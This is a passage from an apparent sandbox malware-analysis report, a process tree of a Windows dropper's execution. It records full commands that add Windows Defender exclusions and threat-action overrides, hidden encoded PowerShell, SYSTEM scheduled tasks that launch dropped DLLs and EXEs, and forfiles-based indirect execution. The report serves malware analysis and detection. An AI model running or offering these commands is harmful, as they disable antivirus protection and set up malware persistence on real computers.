                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4900
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:2688
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4740
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSIYzxyytiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSIYzxyytiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TRPrKrqOfjymC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TRPrKrqOfjymC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dRqtboZzFpLGkHANyeR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dRqtboZzFpLGkHANyeR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hUNZbiKEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hUNZbiKEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vzHhDQJThpHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vzHhDQJThpHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BtspJvyVMEkRHCVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BtspJvyVMEkRHCVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EEqdpbPTzwWMHNatf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EEqdpbPTzwWMHNatf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QTTqELwJAxMxASXQ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QTTqELwJAxMxASXQ\" /t REG_DWORD /d 0 /reg:64;"
                                                      2⤵
                                                      • Drops file in System32 directory
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2968
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSIYzxyytiUn" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                          PID:224
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSIYzxyytiUn" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2108
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSIYzxyytiUn" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:116
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TRPrKrqOfjymC" /t REG_DWORD /d 0 /reg:32
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1580
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TRPrKrqOfjymC" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:4092
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dRqtboZzFpLGkHANyeR" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                                PID:844
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dRqtboZzFpLGkHANyeR" /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:688
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hUNZbiKEU" /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:2372
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hUNZbiKEU" /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3500
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vzHhDQJThpHU2" /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1040
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vzHhDQJThpHU2" /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                    PID:3972
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BtspJvyVMEkRHCVB /t REG_DWORD /d 0 /reg:32
                                                                    3⤵
                                                                      PID:3816
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BtspJvyVMEkRHCVB /t REG_DWORD /d 0 /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3196
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4788
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                      3⤵
                                                                        PID:4116
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                          PID:4764
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1920
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EEqdpbPTzwWMHNatf /t REG_DWORD /d 0 /reg:32
                                                                          3⤵
                                                                            PID:1848
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EEqdpbPTzwWMHNatf /t REG_DWORD /d 0 /reg:64
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:544
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QTTqELwJAxMxASXQ /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3116
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QTTqELwJAxMxASXQ /t REG_DWORD /d 0 /reg:64
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3224
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gTSGSdslh" /SC once /ST 03:10:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          2⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2416
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gTSGSdslh"
                                                                          2⤵
                                                                            PID:408
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gTSGSdslh"
                                                                            2⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2252
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /CREATE /TN "ZPozgnrxsXwixMtgn" /SC once /ST 03:32:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QTTqELwJAxMxASXQ\FnaJbTGJLlJFtrg\uAfeMuI.exe\" TU /HCYkdidCl 385121 /S" /V1 /F
                                                                            2⤵
                                                                            • Drops file in Windows directory
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3912
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /run /I /tn "ZPozgnrxsXwixMtgn"
                                                                            2⤵
                                                                              PID:1820
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 804
                                                                              2⤵
                                                                              • Program crash
                                                                              PID:2740
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                            1⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2188
                                                                            • C:\Windows\system32\gpupdate.exe
                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                              2⤵
                                                                                PID:5008
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                              1⤵
                                                                                PID:3952
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                1⤵
                                                                                  PID:3664
                                                                                • C:\Windows\system32\gpscript.exe
                                                                                  gpscript.exe /RefreshSystemParam
                                                                                  1⤵
                                                                                    PID:2064
                                                                                  • C:\Windows\Temp\QTTqELwJAxMxASXQ\FnaJbTGJLlJFtrg\uAfeMuI.exe
                                                                                    C:\Windows\Temp\QTTqELwJAxMxASXQ\FnaJbTGJLlJFtrg\uAfeMuI.exe TU /HCYkdidCl 385121 /S
                                                                                    1⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops Chrome extension
                                                                                    • Drops file in System32 directory
                                                                                    • Drops file in Program Files directory
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4640
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                      2⤵
                                                                                        PID:3776
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                          3⤵
                                                                                          • Indirect Command Execution
                                                                                          PID:3108
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                            4⤵
                                                                                              PID:3408
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                  PID:2068
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                              3⤵
                                                                                              • Indirect Command Execution
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1800
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                4⤵
                                                                                                  PID:3428
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                    5⤵
                                                                                                      PID:1320
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                  3⤵
                                                                                                  • Indirect Command Execution
                                                                                                  PID:1212
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                    4⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2532
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                      5⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3560
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                  3⤵
                                                                                                  • Indirect Command Execution
                                                                                                  PID:2200
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                    4⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4528
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                      5⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3684
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                  3⤵
                                                                                                  • Indirect Command Execution
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3000
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                    4⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4760
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1724
                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        6⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2028
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "bSxzCgPeqgMvWlpxXo"
                                                                                                2⤵
                                                                                                  PID:4216
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                  2⤵
                                                                                                    PID:2968
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                      3⤵
                                                                                                      • Indirect Command Execution
                                                                                                      PID:2416
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        4⤵
                                                                                                          PID:2920
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                            5⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3844
                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                              6⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:264
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hUNZbiKEU\yQEyTF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MKMiILFAvQoAldZ" /V1 /F
                                                                                                      2⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:3796
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "MKMiILFAvQoAldZ2" /F /xml "C:\Program Files (x86)\hUNZbiKEU\JbnfRHC.xml" /RU "SYSTEM"
                                                                                                      2⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:2968
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /END /TN "MKMiILFAvQoAldZ"
                                                                                                      2⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4872
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "MKMiILFAvQoAldZ"
                                                                                                      2⤵
                                                                                                        PID:3076
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "jSLFNLVTciHvvQ" /F /xml "C:\Program Files (x86)\vzHhDQJThpHU2\JpdwdTy.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:788
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "grWmLoPUTnhxV2" /F /xml "C:\ProgramData\BtspJvyVMEkRHCVB\jEGYypI.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4832
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "bcvzDFOKytsSExQye2" /F /xml "C:\Program Files (x86)\dRqtboZzFpLGkHANyeR\lYnSiyW.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4900
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "ZrYOyTMgIhzSEWsQgsS2" /F /xml "C:\Program Files (x86)\TRPrKrqOfjymC\BLXEgYL.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:384
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "iFVviVMDzFbKFiolO" /SC once /ST 03:00:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QTTqELwJAxMxASXQ\kynVmfkx\QmznfYa.dll\",#1 /eQtdidAOTn 385121" /V1 /F
                                                                                                        2⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:224
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "iFVviVMDzFbKFiolO"
                                                                                                        2⤵
                                                                                                          PID:1212
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "ZPozgnrxsXwixMtgn"
                                                                                                          2⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4628
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 2376
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:2096
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1304 -ip 1304
                                                                                                        1⤵
                                                                                                          PID:2160
                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QTTqELwJAxMxASXQ\kynVmfkx\QmznfYa.dll",#1 /eQtdidAOTn 385121
                                                                                                          1⤵
                                                                                                            PID:372
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QTTqELwJAxMxASXQ\kynVmfkx\QmznfYa.dll",#1 /eQtdidAOTn 385121
                                                                                                              2⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Loads dropped DLL
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:2664
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "iFVviVMDzFbKFiolO"
                                                                                                                3⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3476
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
